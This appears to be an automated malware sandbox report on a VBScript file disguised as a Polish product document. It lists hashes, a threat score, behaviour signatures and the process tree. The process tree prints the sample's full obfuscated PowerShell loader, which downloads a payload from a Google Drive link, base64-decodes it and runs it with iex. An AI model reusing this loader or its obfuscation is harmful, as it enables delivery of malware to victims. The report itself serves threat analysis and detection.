Analysis

  • max time kernel
    139s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/05/2024, 15:31

General

  • Target

    PL_PLK_PT_filter_I-534_wheels_krotki.vbs

  • Size

    428KB

  • MD5

    811ee53795b1753be33e0cda9e0587ab

  • SHA1

    283006567e33997732b2082d7a22b704eec460e7

  • SHA256

    c0380044032fcfa783160e36c4f77b0a1a70f763dd48d7e602441523ce59b193

  • SHA512

    98be5d982daeae3e703a869bf6de66035fc6538f60d00f680c3e2280c0039bc10deb84c40a4d51a66064470d8f6221efa2d2c16a193ecf59d18aadaa3ff6d26d

  • SSDEEP

    6144:wY4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4Z:wzJv0ayfOb64MRycngoavbN0vBrbRHkb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PL_PLK_PT_filter_I-534_wheels_krotki.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Etaarigt = 1;$Naturfnomens213='Sub';$Naturfnomens213+='strin';$Naturfnomens213+='g';Function Aristocrats($Applause){$Kildre=$Applause.Length-$Etaarigt;For($Extradition=1;$Extradition -lt $Kildre;$Extradition+=2){$Unwakefulness+=$Applause.$Naturfnomens213.Invoke( $Extradition, $Etaarigt);}$Unwakefulness;}function Caradhras($Adapted){& ($Disciplineret190) ($Adapted);}$marica=Aristocrats 'TMGonzUi l.l a,/M5 . 0 J(WW.i n d o.w s. SN.TL B1M0P. 0 ; W iFn.6.4 ;M Ax 6.4B; rSv :,1b2N1 .J0F)G bGSeEc kSo /N2,0.1.0M0 1U0A1H DF iGr.eUf.ogxM/.1,2.1 . 0 ';$Formuefllesskaberne=Aristocrats 'DUTs e.r -mA g eDn tM ';$Sportswomanly=Aristocrats ',hGtct pSs,:t/K/ dPr.iOv,eR..gHoSoOg lmeS.uc oSm./.u c.?.eGxUpBoDrVt =Hdio w n.lGoiaAd &eiRdH=.1.u,C Iam A m,eUKGZ a,u,c,RGB,M s sMBmSHx k,dGj,W qRYBD,bcHds FAm ';$craunch=Aristocrats 'S>H ';$Disciplineret190=Aristocrats 'UiBeSxU ';$Aftrre='Scalado';$Skidengs = Aristocrats '.ePc h oP %GaBpRpPd aStuaR%Y\SMNa cBehlSl u m,.ZI nAs R&B& Ee c hCoS tS ';Caradhras (Aristocrats 'R$SgDl,oPbOaAl :kSAt yGnDiMnRg ss=F(UcUmUd. K/.cR B$,SIk i,dIetn gHsH)G ');Caradhras (Aristocrats 'R$MgKlEoCbMa lS:.MCuAsBe uFm sTfHoAn.dOe nU= $ S.pCoDrPtAs w,o.mGaCnSlCyG.SsEpSlSiNtH(P$ cAr a,uGnPcOhP)C ');$Sportswomanly=$Museumsfonden[0];$Indsyet= (Aristocrats '.$ gAl,o,bGa lP:.A,mHb o lRtHe nTe =.NFe wE-VO bFjHe cAtM SSfyFs.t e mB. N e tT.DW eMb CDlRiKeNnTt');$Indsyet+=$Stynings[1];Caradhras ($Indsyet);Caradhras (Aristocrats ' $TATmIb.o.l t.eNn,eS.HHEe ard,ePr.sC[ $UFMoNr.mTu eAfClPlPe.s s,k a bCe r nMeG] =U$SmCa rOiKc.a, ');$Agalinis=Aristocrats '.$UApmUb oSl.t e n eS. D oswTn.lro,aTdFF iUlFeR(N$.S p,oOrQtMsPwuo m.a n lFy.,,$HN.ornKlUi tBu rAg i cA) ';$Nonliturgic=$Stynings[0];Caradhras (Aristocrats 'V$ g.l o bDa l :.B.e dDr,i vAe r,= (wTSeSs t -RPSaSt,h T$TNGo,nElAi tSuPr geiSc,). ');while (!$Bedriver) {Caradhras (Aristocrats 'r$ gSlOo bHaUlC:PA nRg.uCs tRi s e lBlfaHtAe =L$ft.r uGe. ') ;Caradhras $Agalinis;Caradhras (Aristocrats '.S t a rLt -SS l.e eSp l4 ');Caradhras (Aristocrats 'F$Tg,lPoSbBaDl :DBIe d,r,iVvBewr =.(FTSe sPtN-.PAaRtBh ,$TN,oBnUlaiKt uJr g,i c )L ') ;Caradhras (Aristocrats 'M$.gNl,o b aFl,:SBBlAaPnDk,o,fGuDl d,m aFg t,e na=U$AgIlFo b.aOl :KH.eOl p mIe eHtB+ +H% $AM.u,s eBuDmDs f,oFn dBeCn ..c.o u.n t ') ;$Sportswomanly=$Museumsfonden[$Blankofuldmagten];}$Forumize=349551;$Dialyseredes=25578;Caradhras (Aristocrats 'R$ g,laoVb,aBl,:.O rSbOiUc U=S LG eTtM-EC o.nUtRedn tA R$QNFo,nzl.ittSuKr gAiBc ');Caradhras (Aristocrats 'S$ g.lSoWb aEl :CSFu,c cGe s sUitvMtO F=D S[ S.y sKtbeSm..,C oTnsv,e,rHtP],:.:OFTr.oPm BBajsTe,6 4 S t r ian gK(.$ O r b,idc )D ');Caradhras (Aristocrats ',$ g lGoRb.aTlA: T r k,g,rVu n.dSl alg eBt.s S=. [ S yKs t eLmH. TCe.x tD.REUnRc o dWi.n,gN],: : A S.CKI I .SGUe tSS.t rHi nRg.( $RSEuGcLcSe s.sJi vst )S ');Caradhras (Aristocrats ' $Og lGo.b,aDl,:GM iFs t uMrMeH= $BT,rSkAgMr,u n d lSaBg e tKsV. s upb sWtSr iSn g ( $.F oSrKu m iAzKeU, $SD i a l y,s e,r.eAd.e,sd). ');Caradhras $Misture;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macellum.Ins && echo t"
        3⤵
          PID:5108

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pxxki2jc.opj.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2332-4-0x00007FFFB9FB0000-0x00007FFFBA279000-memory.dmp

      Filesize

      2.8MB

    • memory/2332-5-0x00007FFFB9FB0000-0x00007FFFBA279000-memory.dmp

      Filesize

      2.8MB

    • memory/2332-11-0x000001B92F980000-0x000001B92F9A2000-memory.dmp

      Filesize

      136KB

    • memory/2332-18-0x00007FFFB9FB0000-0x00007FFFBA279000-memory.dmp

      Filesize

      2.8MB

    • memory/2332-21-0x00007FFFB9FB0000-0x00007FFFBA279000-memory.dmp

      Filesize

      2.8MB